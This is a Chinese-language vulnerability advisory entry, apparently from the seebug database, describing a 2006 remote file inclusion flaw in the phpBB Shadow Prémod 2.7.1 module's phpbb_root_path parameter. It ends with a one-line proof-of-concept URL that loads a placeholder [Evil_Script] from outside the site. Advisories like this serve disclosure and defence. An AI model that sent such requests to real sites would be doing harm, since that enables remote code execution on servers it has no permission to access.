Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:119
HistoryOct 25, 2006 - 12:00 a.m.

phpBB Shadow Prmod模块phpbb_root_path远程文件包含漏洞

2006-10-2500:00:00
Root
www.seebug.org
9
JSON

phpBB是非常流行的WEB论坛程序。

phpBB的Shadow Prmod模块处理用户请求时存在输入验证,远程攻击者可能利用此漏洞以Web进程权限在服务器上执行任意命令。

Shadow Prmod模块的includes/functions_portal.php脚本没有正确验证phpbb_root_path参数的输入,允许攻击者通过包含本地或外部资源的任意文件导致执行任意代码。成功攻击要求打开了register_globals。

phpBB Group Shadow Prémod 2.7.1
厂商补丁:

phpBB Group

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://premod-shadow.info/


                                                http://www.site.com/[path]/includes/functions_portal.php?phpbb_root_path=[Evil_Script]
JSON